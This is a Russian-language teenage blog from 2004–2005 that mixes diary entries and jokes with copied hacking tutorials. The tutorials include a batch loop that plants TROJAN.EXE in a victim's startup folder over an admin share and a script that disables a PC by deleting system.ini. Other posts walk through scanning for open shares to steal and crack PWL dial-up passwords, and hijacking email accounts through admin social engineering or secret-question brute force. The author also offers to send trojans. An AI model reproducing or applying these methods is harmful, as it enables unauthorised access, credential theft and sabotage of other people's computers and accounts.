• Авторизация


ПОМАГИТЕ!!!!! 04-03-2005 01:00


Вы прикинте, я изменил своей девушке с ее ЛУЧШЕЙ ПОДРУГОЙ. Как так можна??? Мы теперь с ней расстались, и не знаю как мне ее вернуть... Может мне ктонить поможет??? ПОЖАЛУЙСТА!!!!
комментарии: 0 понравилось! вверх^ к полной версии
Фича. 15-02-2005 00:14


Седня се поставил прогу, Skype Эт инет телефон=))) Тока в нет залез звонок, ну я отвечаю, а мне прямо в наушники орут чето непонятное на заморском Англиском=))) Я им как мог, объяснил что по ихнему нефига... Вроде поняли. Гы... Пришлось применять все знания ихнего языка в том числе такие словечки как Fuck, Bitch и все в ентом духе.
комментарии: 0 понравилось! вверх^ к полной версии

Сука - скука. 10-02-2005 01:07


Делать вообще нефига, скушно до посинения... Ё, блина, пойду в чат, мож че интересного бует....
комментарии: 2 понравилось! вверх^ к полной версии
ЖОПА!!! 02-02-2005 23:28


Седня опятьки в тренажорку ходил... Эт ваще ЖОПА полная. Так я потом ышо и гулять сразу поперся. Ща вот еле на клавиши пальцами жмякаю. Ваще труба...
комментарии: 2 понравилось! вверх^ к полной версии
Rulezzzzz 31-01-2005 23:35


Седня стыбрил всетаки у мальца MP3 Fear Factory!!! Ура! Во енто ваще руль!!!! Давненько я такой колбасы не слыхивл.
комментарии: 2 понравилось! вверх^ к полной версии
А енто шоб знали... 28-01-2005 15:33


Вот и уголовный кодекс. Шоб знали че бывает за взломы и т.д.
Статья 272. Неправомерный доступ к компьютерной информации.


Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.
То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, - наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.

\Комментарий к статье 272\
1. Объектом данного преступления является безопасность пользования интеллектуальными и вещественными средствами вычислительной техники.
2. Объективную сторону данного преступления составляют создание, использование и распространение вредоносных программ для ЭВМ, а равно внесение вредоносных изменений в существующие программы.
3. Программа для ЭВМ - это объективная форма представления совокупности данных и команд, предназначенных для функционирования ЭВМ с целью получения определенного результата (ст. 1 Закона РФ "О правовой охране программ для электронных вычислительных машин и баз данных"). Программа реализует алгоритм решения какой-либо задачи.
4. Создание программы для ЭВМ - это написание ее алгоритма, т.е. последовательности логических команд, с дальнейшим преобразованием его в машинный язык ЭВМ. Внесение изменений в существующую программу означает изменение ее алгоритма путем исключения его фрагментов, замены их другими, дополнения его. Внесение изменений в существующую программу может быть элементом объективной стороны данного преступления лишь в том случае, если виновный исправил работающую в ЭВМ программу либо распространил исправленную программу на любом носителе.
5. Ответственность по данной норме уголовного закона должна наступать и в том случае, если изменения в существующую программу вносятся лицом не непосредственно, а посредством специальной программы для ЭВМ, разработанной для внесения соответствующих изменений.
6. Вредоносность или полезность соответствующих программ для ЭВМ определяется не в зависимости от их назначения, способности уничтожать, блокировать, модифицировать, копировать информацию (это - вполне типичные функции абсолютно легальных программ), а в связи с тем, предполагает ли их действие, во-первых, предварительное уведомление собственника компьютерной информации или другого добросовестного пользователя о характере действия программы, а во-вторых, получение его согласия (санкции) на реализацию программой своего назначения. Нарушение одного из этих требований делает программу для ЭВМ вредоносной.
7. Вредоносность так называемых "компьютерных вирусов" связана с их свойством самовоспроизводиться и создавать помехи в работе на ЭВМ без ведома и санкции добросовестных пользователей. Вирусные программы обычно включают команды, обеспечивающие самокопирование и маскировку.
8. Программа считается приводящей к указанным в данной норме уголовного закона неблагоприятным последствиям, если именно ее функционирование вызывает уничтожение, блокирование, модификацию, копирование компьютерной информации.
9. Использование программы для ЭВМ - это выпуск ее в свет, воспроизведение и иные действия по введению ее в хозяйственный оборот в изначальной или модифицированной форме, а также самостоятельное применение этой программы по назначению. Под использованием машинного носителя с такой программой понимается всякое его употребление с целью использования записанной на нем программы для ЭВМ. Использование вредоносной программы для ЭВМ для личных нужд (например, для уничтожения собственной компьютерной информации) не наказуемо.
10. Распространение программы для ЭВМ - это предоставление доступа к воспроизведенной в любой материальной форме программе для ЭВМ, в том числе сетевыми и иными способами, а также путем продажи, проката, сдачи внаем, предоставления взаймы, а также создание условий для самораспространения программы. Под распространением машинного носителя с программой для ЭВМ понимается его передача на каких бы то ни было условиях третьим лицам.
11. Под тяжкими последствиями создания, использования
Читать далее...
комментарии: 2 понравилось! вверх^ к полной версии
Новая статейка. Ура товарищи!!! 24-01-2005 01:44


Надыбал я ее на своем любимом винте... Прошу любить и жаловать. ОЧЕНЬ ЖДУ КОММЕНТОВ!
Статья не дает конкретных рекомендаций и данных, дабы не каждый мог воспользоваться описанными вещщами.

Цель статьи показать на что можно извратиться в обычных форточках, ведь многие даже и не предполагают о подобных методах извращщения, хотя все довольно просто и обычно. Применение же подобных вещщей очень сильно увеличивает обнаружение и удаление трояноподобия из системы.

Начнем обзор с небольшого экускурса по программке GlassControl 3.1, ее способ самоустановки довольно необычен, за что он и получил свою популярность.

Как все происходит ?

GC3 прописывает себя в реестре на автозапуск из сети, даже если виря нет в системе, то он будет само устанавливаться именно из за ссылки в реестре.
И вторая - главная фишка в подмене одного системного файла, который грузиться по умолчанию. Происходит даже не его подмена, а подмена ссылки на него при запуске системы, после чего GC3 сам его загружает.

Этот медод как оказалось - очень эффективен.

Создание скрытого диска - оказалась большой дырой при удаленном обнаружении пораженных компьютеров в сети. Создаетсяя диск Z$ с полным доступом. Как известно в сети можно найти все скрытые шары, но для этого надо пользоваться собственным ПО, система не позволит узнать это, только если не тыкать пальцем в небо.

Как создать скрытый диск так чтобы он не сканировался любым ПО ?

Выходов немного.
1) Один из них - создание динамическо-открываемого диска,2) второй - создание скрытого системного ресурса.

1-Диск открывается на один сеанс работы по сигналу, опять же программа дожна распознать такой сигнал, и откыть доступ на один сеанс. Во время этого сеанса иск могут увидеть, но в остальное время - нет(большинство времени) Это создает некоторые проблеммы, нужно время - и это самое важное.

2-Создается шара под именем printer$ или другая. Известно что эта шара обычно отдает в доступ путь %windir%\system , поэтому шансы на то что ее будут проверять именно на этот путь - малы, НО они есть 8(

можно обьединить оба способа и прибавить к нему установка пароля на доступ к ресурсу, получиться вполне Steath 8)

Чертова рука при отдавании ресурса в доступ на иконке ресурса..

Что делать если народ научился опознавать что их диск отдан в сеть ? Если они это определяют по синей дурацкой руке, то проблемма решается просто, Мелкософт предусматрела такую возможность, когда создается шара, в ее флагах прописывается что-то типа 192 - на R/W или 191 на ReadOnly , однако если у вас выдан в сеть принтак или стоит удаленка, то папка с виндой не держиться ручищщей .. и флаг поэтому у них другой : 302 на запись и 301 на чтение. Младшие 2 бита отвечают за тип доступа, а пятый(или 11 8-\) за видимость значка.Вот и все, просто когда выдаешь ресурс, то флаг должен быть типа 302.
Ну а если народ прочухивает дело по реестру, то тут уж помоч могут только трояны, ключ CURRENT_USER не выдаст шару, если в ней прописать ее, опробовано!
Но есть еще один способ.. он довольно прямой и наглый, но сработает.. нужно просто стереть программу REGEDIT, либо на время ее запуска подсовывать заранее скопированный реестр.

К вопросу о $

Как-то я ковырял систему, уж очень мне нравиться искать в ней скрытости и вшитости. Заинтересовал меня ADMIN$ и обнаружил нехилую дыру..

Нехилая $ дыра

Что позволяет дыра ?

Дыра позволяет кому угодно получить полный доступ ко всем жестким дискам жертвы,когда системой управляет кто-либо из сети.

Какие же это чертовы условия ?

Стоит галка - удаленное управление
на данном сеансе кто-либо использовал Удаленку
Расскажи как мне захачить кого-нибудь?

Для этого у него дожны быть соблюдены вышеуказанные условия. Если все так, то просто набирай в окне "ВЫПОЛНИТЬ": \\computer\c$
вот тебе и его полный диск, можешь попробовать \\computer\d$ и так далее. Если на машине несколько жестких дисков, то все они будут доступны в текущщем сеансе работы жертвы.

или можно написать ХАК на BAT языке..

сначала ищешь комп, проверяешь его на наличие ADMIN$, пытаешь подобрать пароль - неполучается, тогда запускаешь HACK.BAT
-----------------------------

:again
copy TROJAN.EXE "\\VICTIM\C$\Windows\Главное меню\Программы\Автозагрузка\"
goto again

-----------------cut here----
Запускаешь такую мысль и просто напросто ждешь.. может уйти много времени, можешь спровоцировать если знаешь кого ввести пароль для управления. Если сработает, то после перезагрузки жертвы запуститься ваша программа TROJAN.EXE, чего и требовалось сделать.

Почему так происходит ?

Система очень простая: Когда кто-либо берет удаленное управление, то после набора пароля, якобы ЕМУ становиться доступен весь диск жертвы, ведь он набрал пароль!, но MicroSoft не предусмотрела аудентификацию, поэтому машина жертвы не может понять кто к ней ломиться на винт и пускает всех. При этом возникает оочень интересный эффект: В реестре этих ШАР нету, но они открыты под именами дисков плюс знак "$"

Как
Читать далее...
комментарии: 2 понравилось! вверх^ к полной версии
Cтатья про... 22-01-2005 05:02


Прет!!! Как и обещал выкладываю статейку как сделать се халявный Инет. Прошу:
Для начала, надо качнуть се какуюнить сканилку... типа ENT=))) Я расскажу как юзать NBS.
Енту прогу можна скачать на www.xtool.org. В архиве будет два EXE' шника. Вначале запустим NSS сканер.
Вводим Ip провайдера услугами которого ты будеш пользоваться и кнопаем "сканировать". После этих нехитрых действий,
должно появиться туеву хучу
ипешников всяких юзверей. Но нам не подойдет любой комп. В поле "Имя-статус" смотрим значек сетевого диска.
Короче, не похожий на другие=))) И незамедлительно кликаем на него левой кнопой Мауса. Появится другое окно. Енто и будет
второй exe' шник. После всего ентого кнопаем на "подключиться" и ждем. Ооооо, вот и появились его В смысле юзверя=))),
диски. Нажимаем на "подобрать" и чуток ждем. Если все Ок, то напротив ентого диска появится надпись
"Без пароля". Кликаем на диск, и подключаем его как сетевой диск. Потом открываем командную строку и пишем имя ентого диска. Нампример E: После того как ты залез на его винт, пиши E:\>dir win* Как тока ты нашел его винду, заходь
в енту папку, там пиши E:\windows>dir *.pwl после чего должно появиться типа
Том в устройстве Е не имеет метки
Серийный номер тома: 2247-15D0
Содержимое каталога D:\WIN95
lamer PWL 730 02-05-99 10:31p lamer.PWL
1 файл(а,ов) 730 байт
0 каталог(а,ов) 287,997,952 байт свободно
Пишиш E:\windows>copy lamer.pwl c:\hack
На ентом, первый этап закончен.
Терь можна отрубать его диск. и доставать порогу pwlhack.
Для начала надо скопировать стыбжиную PWl'ку в папку с прогой pwlhack.
Потом врубаем ее тоже под ДОС и пишем
C:\hack\PWLHACK>pwlhack.exe /list lamer.pwl lamer
Должно появиться
C) 21-May-1999y by Hard Wisdom "PWL's Hacker" v4.10 (1996,97,98,99)
Enter the password:
File 'lamer.PWL' has size 730 bytes, version [W95osr2_Win98]
for user 'lamer' with password '' contains:
-[Type]-[The resource location string]--------------[Password]-
Dial X *Rna\Соединение с lamerishe\KS015174 fsa3Xfa12
---------------------------------------------------------------
Indexed Entryes: 1; Number of resources: 1.
Короче
Login :KS015174
Password:fsa3Xfa12
Ну вот и все. Удачного вам хака. Кому надо эти и многие другие проги, пишите мне на Corr@xaker.ru, вышлю.
(R)Corr2005!

комментарии: 3 понравилось! вверх^ к полной версии
Ышо одна лажа... Западло. 22-01-2005 01:41


Во ента херь может кому и поможет... чтайте:
1. Создаем батник (antilammo.bat) на d-диске, в нем пишем: @echo off {что б не показывало содержимое при загрузки} copy c:\windows\system.ini d:\ {а это для того, чтобы потом можно было пофиксить тачку} DEL c:\windows\system.ini {no comments} del d:\antilammo.bat {и чтобы никаких следов}
2. А теперь клепаем другой батник (savelammo.bat), в котором пишем: @echo off copy d:\system.ini c:\windows {со следующей перезагрузки все ОК} del d:\savelammo.bat
3. Прописываешь просто в autoexec.bat вот это: d:\antilammo.bat DEL c:\autoexec.bat {по желанию и настроению} И в результате комп вешается только после перезагрузки. С задержкой, зато безнаказанно :). А вот как пофиксить тачку? Помнишь про savelammo.bat? Значит делаешь так. Загружаешь комп и на 125-ой секунде :) жмешь F8, а когда появляется менюшка, выбираешь пункт загрузки в DOS. В результате оказываешься в DOS и просто грузишь заранее состряпанный SAVELAMMO.BAT. Гениальное все просто :).

P.S. Завтро али послезавтро, кину статью как тырить PWL файло, как и чем его расшифроватьки.
комментарии: 0 понравилось! вверх^ к полной версии
Просто так... 20-01-2005 01:07


Вот у ся нарыл почитайте, прикольно.
1.
Хоpошо: Твоя жена беpеменна.
Плохо: В yтpобе целых тpи pебёнка.
Очень плохо: Ты сделал опеpацию по пеpевязке семенных канатиков
тpи года назад.
2.
Хоpошо: Твоя жена с тобой не pазговаpивает.
Плохо: Она хочет pазвода.
Очень плохо: Она адвокат.
3.
Хоpошо: Твой сын взpослеет.
Плохо: Завёл pоман с пожилой соседкой.
Очень плохо: Ты тоже.
4.
Хоpошо: Твой сын пpоводит много вpемени в своей комнате.
Плохо: У него в комнате ты находишь спpятанные поpнофильмы.
Очень плохо: Ты в некотоpых из них.
5.
Хоpошо: Твой мyж наконец-то согласен - хватит детей!
Плохо: Hе можешь найти пpотивозачаточные таблетки.
Очень плохо: Их взяла твоя дочь.
6.
Хоpошо: Твой мyж pазбиpается в моде.
Плохо: Ты обнаpyживаешь, что тайком он надевает твои вещи.
Очень плохо: Емy они идyт больше, чем тебе.
7.
Хоpошо: Ты пpоводишь беседy о тычинке и пестике со своей дочкой.
Плохо: Она постоянно тебя пеpебивает...
Очень плохо: ...и попpавляет.
8.
Хоpошо: У твоего сына пеpвое свидание.
Плохо: С мyжчиной.
Очень плохо: Котоpый твой лyчший дpyг.
9.
Хоpошо: Твоя дочь нашла pаботy сpазy после инститyта.
Плохо: в качестве пpоститyтки.
Очень плохо: Hекотоpые из твоих коллег - её клиенты.
Слишком плохо: Она заpабатывает больше, чем ты.
10.
Хоpошо: Читая всё вышепеpечисленное, ты смеялся.
Плохо: Ты знаешь людей с похожими ситyациями.
Очень плохо: Один из них - ты.
комментарии: 0 понравилось! вверх^ к полной версии
Не очем... 11-01-2005 01:02


Драсте всем! Хотя один хер этот дневник нихто не читает... =))) Ну, дело не в этом. Короче всех с Новым 2005 Годом всем всего и побольше!!!
Юлик, прости что не пишу потом все расскажу... У меня ща проблем до }{... Много. Еще раз прости.
комментарии: 1 понравилось! вверх^ к полной версии
О вреде геймилок... 17-12-2004 00:23


Я седня в сотый раз перечитывал журнал }{акер и наткнулся на статейку. Прикольнула она меня, вот решил поделиться.
На этот раз мы поговорим о влиянии компьютерных игр на мозг человека. Мои последние исследования показали, что даже невинные на первый взгляд игрушки подвергают необратимой деформации сознание среднестатистического геймера. Кстати, в ходе моих очередных бесчеловечных экспериментов на людях, мышах и джойстиках были выявлены довольно интересные закономерности. Например, как вы думаете, какая игра оказывает наиболее деструктивное влияние на поведенческие инстинкты человека, превращая его в неумолимую боевую машину? Квейк? Друзья мои, Квейк по сравнению с этой игрой - просто апогей гуманизма, проповедующий любовь к ближнему, а также вселенское милосердие и сострадание к инопланетным культурам. Carmageddon? Ни в коей мере! Если этот миролюбивый симулятор и породил двух-трех маньяков-убийц одиноких старушек, то теперь они надежно заперты в редакции Х и занимаются своим темным (что еще, кстати, довольно спорно) делом в крохи свободного от работы времени.

Да, друзья мои, замочите из шотг... брррр... то есть плюньте в лицо продажным журналисткам, которые со слезами на глазах заявляют, что "Два техасских подростка, наигравшись в Квейк, съели свою пятилетнюю сестру, а затем зверски убили и изнасиловали бабушку", ибо они не видят сути проблемы. Но не буду вас больше томить и сразу предъявлю ошеломляющие результаты исследований. Итак, самым страшным психологическим оружием, которое наиболее жутким образом изменяет сознание человека, являются ролевые игры. Самой деструктивной игрой учеными всего мира во главе со мной признан сиквел Fallout. И не надо тут снисходительно улыбаться, произнося: "Ну и что же там такого зверского?". А ну-ка вспомни, дорогой друг, что ты делал пятнадцать минут назад? Да, да, ты. Вспомнил? Правильно, пятнадцать минут назад ты убил десятилетнего мальчика, чтобы, покопавшись в его останках, извлечь горстку монет, так необходимых тебе на новый гранатомет. А что ты сказал патрулю, который расстреливал безоружных ученых? И не надо водить ножкой по полу, я хорошо помню эти слова: "О, господин, я никогда никому не скажу, что вы только что замочили здесь безоружных невинных людей". А какие навыки наиболее развиты у твоего героя? Добродушие, первая помощь и ораторское искусство? Чего глазки-то забегали? Да за версту видно, что у тебя на максимуме воровство, взлом и шпионаж.

Я даже составил небольшой список тех принципов, которыми начинает руководствоваться любой человек, поигравший в Fallout (2) больше часа:

1. Если у кого-то есть оружие - его надо убить и забрать это оружие.

2. Если у кого-то нет оружия, но есть деньги - его надо убить и забрать деньги.

3. Если у кого-то нет ни оружия, ни денег - его надо убить, чтобы накопить опыт убийств.

4. Если кого-то можно убить, его нужно убить!

5. Если кого-то нельзя убить, надо пойти убить того, кого можно, забрать его оружие и убить того, кого нельзя.

Я бы мог продолжать этот список до бесконечности, причем в каждом из его пунктов слово "убить" встречалось бы не менее двух раз, но для наглядности приведу лучше статистику жизнедеятельности людей, на которых я испытывал Fallout (2). Всего в эксперименте участвовало 28 человек, включая меня.
6 человек уволены с работы (я тоже).

9 отчислены из института за непосещаемость (я тоже).

11 при попытке отобрать у них диск с игрой совершили преступления различной степени тяжести, от зверского избиения хозяина диска до попытки преднамеренного убийства (я - хозяин диска).

7 потеряли своих девушек, ответив на предложение погулять незамысловатыми матерными выражениями, чередующимися со словами "армор, плазма, мутант и пауэ райфл" (я тоже).

1 простоял целый день в коридоре, на все вопросы отвечая, что ему не хватает очков действия для того чтобы дойти до двери (и не надо так на меня смотреть).

4 находятся сейчас в лечебнице для душевнобольных, куда их доставили охранники одного из магазинов 24 часа. Эти индивидуумы представились как сотрудники психоделической разведки, отделения братства стали и потребовали от продавщицы "джэт и атомный поглотитель ".


комментарии: 0 понравилось! вверх^ к полной версии
Драсте всем!!! Я седня узнал что ентот дэй 13-12-2004 01:29


Драсте всем!!! Я седня узнал что ентот дэй конситуции последний вообще... Больше его никода небудет... Обидно! Лан пойду я... Пока всем!
комментарии: 0 понравилось! вверх^ к полной версии
Еще одна статейка... 10-12-2004 02:19


А вот и я!!! Давненько меня здесь небыло... Ловите новую статейку по Хаку. Надеюсь пригодится...
Чтобы не стать жертвой чужих экспериментов со сканерами, посмотрим, как новички добывают халявный инет:
Этап 1.

ДЛЯ начала надо скачать прогу PWLhack ,собственно это переборщик для PWL файлов для винды9Х , или PWLTool (RePWL) вот с ней и будем работать . Далее стоит выбрать подходяший сканер , в нашем случае возьмем Essential Net Tools .и фар манаджер думаю обьяснять, что ето не надо :).

Этап 2.

НЕ будем ждать сразу все применем на практике .Запустите программу Essential Net Tools . В левой колонке, нажимаете на NBScan В нижнем окошке, где написано Starting IP address:, введите начальный IP. В нашем случае это 212.38.112.1 Автоматически заполнится нижнее окошко - Ending IP address. И нажимаете на кнопку Start.

Программа начнёт сканировать все подключённые к этому диапазону в данное время компьютеры. После окончания сканирования смотрите на результаты. В колонке RS есть надписи YES и NO. Сразу же уберите взгляды с NO . И можете больше не обращать на них внимания. Нам нужны только YES. Но и это ещё не всё.

В самой последней колонке, где написано MAC Address , видно много цифр.Опять же, уберите взгляды с чисел, начинающимися на 00: Это системы Windows 2000, Unux и другие. С них вы всё равно ничего не получите. Нам нужны OS - Windows 95, 98, Me.

Цифры типа 44:45:53:54:... это и есть нужные нам ситемы . В них то мы и будем искать расшаренныЙ диск С. Выбрав первую жертву, например

Lamos microsoft YES
213.45.67.2 44:45:53:54:00:00

тыкаете на него правой кнопкой мышки и нажимаете Open Computer Система при этом может на 2-3 минуты затормозить, винт затрещит, начнёт думать. Не волнуйтесь, это нормально. Откроется панель Explorer (точно такая же, как когда вы открываете "Мой компьютер")

Смотрите на названия папок, открывшихся там. Если там есть папка С, то она нам и нужна. Некоторые юзеры могут переименовать диск С на своё имя или фамилию или ещё как - либо. Так что если диска С вы не увидите, а вместо него увидите допустим папку "Вася", то стоит и её просмотреть (но папок там может и не быть, в этом случае сразу же переходите к следующей жертве ). А если всё вышеуказанное вы увидели, то не спешите радоваться ;) Это пока может ещё не Эврика. Закройте окно Explorer и нажмите в левой колонке ENT - a, на кнопку Shares. Внизу , в окошке Share name: введите следущее //213.45.67.2/c

Это IP адрес и диск С, который вы увидели когда открывали комп жертвы. А в правом, нижнем всплывающем окошке(Local drive), выберите любую из букв. Это будет ваш временный локальный диск. Нажмите на кнопку "Mount", т.е. подключиться. Опять же комп может затормозить на пару минут. И , следующее, что вы увидите, - появится надпись "connection succesfull", что означает подключено чего мы и добивались.

Но, может произойти и хреновое. Может появиться надпись - неправильный пароль. В этом случае попробуйте эту - последнюю процедуру ещё раз . если ета шняга пояилась опять можно наето дело забить ,это будет означать , что он установил пароль на диск и придется искать новых жервт но я думаю их то утя будет много )АЕсли увас все прошло удачнои диск не запоролен то переходим к пункту 3

Этап 3.

Открываете программу FAR manager , и начинаете просматривать и копировать нужное из его диска С. при етом фар может немного подлагивать. СКАЧИВАТЬ НАДО ФАИЛЫ С РАСШИРЕНИЕМ .PVL, не копируйте фаил Rna.PVL он всегда пустой !

Этап 4.

Скопированный pwl, например lamer.pwl, запускате (как обычно вы запускаете любую программу или файл). В открывшейся программе PWLTool нажимате кнопку CheckPass, или, если появится сообщение (имя незарегистрировано в вашей системе), нажмите CheckPassFast и прога начнёт искать пароль на зпароленный lamer.pwl. Далее вы увидете все пароли жертвы. Но бывает и такое, что при нажатии кнопки выйдет сообщение о неправильном пароле на PWL. В этом случае нажмите на кнопку "SearchPasswordFast" и программа начнёт искать пароль pwl-ки.Если программа не найдёт пароль, увеличьте значение в окошке "To:" это кол-во знаков в пароле или измените знаки в окне "Charset string".Ну если совсем крайняк или ты знаеш что у тя в пвлке лежит пароль от Васеного анлима на месяц то тогда надо страться вскрыть всеми способами например : SmartForce, где находится другой переберальщик паролей, етот способ может занять от 4 минут до часа.

Итак, если всё нормально, программа откроет все пароли этого PWL фаила.внем должно лижать чтот вроде етого:

Dial-up:'*RnaСоединениеamlin@prov.ru'
Password:'123'

Ну вот и все, надеюсь теперь ты сможеш защитить себя от таких людей!

комментарии: 3 понравилось! вверх^ к полной версии
Хренова мне... 05-12-2004 01:28


Драсте!!! У меня седня ваще депресище какой то. Делать ваще ничо неохота, весь день спал... Ваще скукота! Эх, пойду в чат, мож там хоть повеселее станет...
комментарии: 0 понравилось! вверх^ к полной версии
ФЛУУУУУУУД!!! 03-12-2004 00:48


Всем привет!!! Вчера в чате висел, ну как всегда через десять минут мне стало скучно до ужаса и начал флудить... Блин, нравится мне енто занятие... Весело, все орут чето, злятся, а тебе пофигам. Правда флудю я по ламерски, но прикалывает меня енто...
комментарии: 0 понравилось! вверх^ к полной версии
ВЗЛОМ МЫЛА!!! 02-12-2004 00:29


Драсте всем!!! Это первая статья о хаке. Она посвещена взлому мыла. Прошу оценить.
Первый способ (один из самых простых)
Пишите владельцу мыла какое нить письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил. Если это какой нить \"чудо-крутой хакер\", то что нить типа: \"Слушай, а ты в натуре можешь сайт сломать??? http://www.microsoft.com/ не твоя работа???\" и так далее в этом духе...;-) Если Веб-мастер, то что нить типа: \"Мне так нравится как ты пишешь! А у тебя JAVA-скрипта нету, что б он там что то делал???\"...По фигу ЧТО, главное что б от него назад ответ пришел. В принципе эта вся процедура была только для того, что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место расположения \"клиента\". То бишь если по ентому мылу находится аська, то смотрим инфу в аське, город (если не прописан в аське, то по ИП), имя, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной системы есть админ, и у 99% www-шные сервера), обычно это адреса admin@provider.com и support@provider.com. Так вот... Пишешь письмо (очень желательно через www-браузер, например от www.mail.ru или www.hotmail.com) и через анонимную проксю. Это для того что б в заголовке пакета был ИП прокси. Так.... для секьюрити... ;-) Так вот. В теле письма пишешь, что так и так... Злобные хакеры украли у тебя мыло, а тебе очень нравится их служба, сервис, скорость работы, безглючность и все такое... Что ты никогда не променяешь ихний сервис, и что они вообще самые крутые мыльщики! Указываешь ИМЯ, ФАМИЛИЮ, ЗИП, ГОРОД, Телефон (от балды) или что они там еще просят.... Ессено назад придет письмо, что \"Информация не совпадает с введенной при регистрации и все такое...\". Но ты будь настойчивей! Пиши назад, что ТО_ЧТО_ТЫ_ИМ_ВЫДАЕШЬ - ЕДИНСТВЕННАЯ ВЕРНАЯ ИНФОРМАЦИЯ о ТВОЕМ аккаунте! И повторяешь им ту же инфу, что и первый раз. И так пока админ не сломится...но не забывай каждый раз расхваливать их сервис! ;-) Обычно раз на 7-10 прокатывает... ;-) У меня был даже раз случай, когда один буржуйский админ \"отдал\" мне мыло, где (как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала той что я ему ВЫДАВАЛ якобы за владельца аккаунта! Так что дерзайте, тут главное БОЛЬШЕ фантазии и упорства! Но и о безопасности не забывайте!

Второй способ (посложнее)

Посложнее, но все равно общедоступный. Почти в каждом мыльном сервисе есть служба что типа \"Foggot Password?\" Так вот...Заходим туды (предварительно не забыв изменить атрибуты филе cookie_для_этой_службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы... Если повезет , то вопрос будет (к примеру на мыло.ру) \"В каком городе ты родился\"? В первом способе описано как узнавать город юзверя по мылу , так что на этом не бум останавливаться .Ну и вопросы бывают \"кустомайзские\"- типа \"2000\" , ответ обычно такойже..;-) А вот если что нить типа \"Как зовут мою собаку?\" , то читай ниже...

Открываем эту страницу (ну где вводить надо ответ на секретный вопрос , не догоняешь что ль???;-)) итам в HTML-просмотре ищем строчкутипа : form action=\"/cgi-bin/3970.dll?secquest\" итд... Так вот... Если урл мыла http://www.mail.ru , то полный урл места куда отправляется\"секретный ответ\" будет http://www.mail.ru/cgi-bin/3970.dll?secquest. Этот урл вводишь вместе с индефикатором Вопроса в программу типа WWWHack. Идентификатор вопроса находится там же где и form action=\"/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту программу или загружаешь встроенный wordlist c паролями или пишешь свой по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и ждешь...

На этом пока все! ЕСЛИ КТО МОЖЕТ ПОДОГНАТЬ ИНЕТЕРЕСНУЮ СТАТЬЮ В ЭТОМ НАПРАВЛЕНИИ, ПРОШУ ПИСАТЬ МНЕ НА МЫЛО. ГДЕ СВИСНУЛ ЭТУ СТАТЬЮ НЕПОМНЮ, ВРОДЕ НА securityzone.flip.ru

Кстати поздравте меня, я се собаку завел!!! Терь хоть нескучно. Она тока малая еще, докалупывает меня...
комментарии: 1 понравилось! вверх^ к полной версии
Хак и все о нем... 01-12-2004 00:15


Дарова всем!!! Я се седня Аську поставил!:hlop: Стучитесь все кто хочет. И нехочет:)))
Я тут подумал и решил что наэрно буду гдето раза два в неделю выставлять на паказ статьи по хаку или по системе... Так что наэрно завтро или послезавтро появится первая статья. Конечно они все скомунижены с сайтов... Но а что делать:))) Вообщем смотрите.
Через пару деньков займусь в серьез созданием своего сайта. К ентому делу подключино несколько таких же интузиастов. Надеюсь чтонить выгорит.
Ну се, я ушел
комментарии: 1 понравилось! вверх^ к полной версии
Помогите кто может! 30-11-2004 00:15


Седня пол дня с почтавиком своим маялся. Глючил гад как тока мог. У меня просто The Bat! стоит. Вещь ваще рульная!!! Всем советую. Кстати, если кто хочет, могу прислать мо мылу, он неочень много весит русский 3.5 метра, а англиский 2,5. Могу еще софта подкинуть, сканеры, нюки, трояны и все в этом роде. Так что если чаво, пишите на мыло, вышлю.

З.Ы. Если у вас есь че антиресное такого же типа, присылайте буду бесконечно рад!!! Очень хочу кряк для своей мыльницы. Мож поможите.
комментарии: 1 понравилось! вверх^ к полной версии
Музон 29-11-2004 00:12


Седня се скачал новый альбом Киш. Ну так, ничо, слушать можна. Меня в основном Korn, Slipknot и Nirvana рулит. Вот это сила. Ну Киш конечно тоже можно послушать иногда. Раньше от него ваще перся, а ща заглохло. Вот так.
комментарии: 0 понравилось! вверх^ к полной версии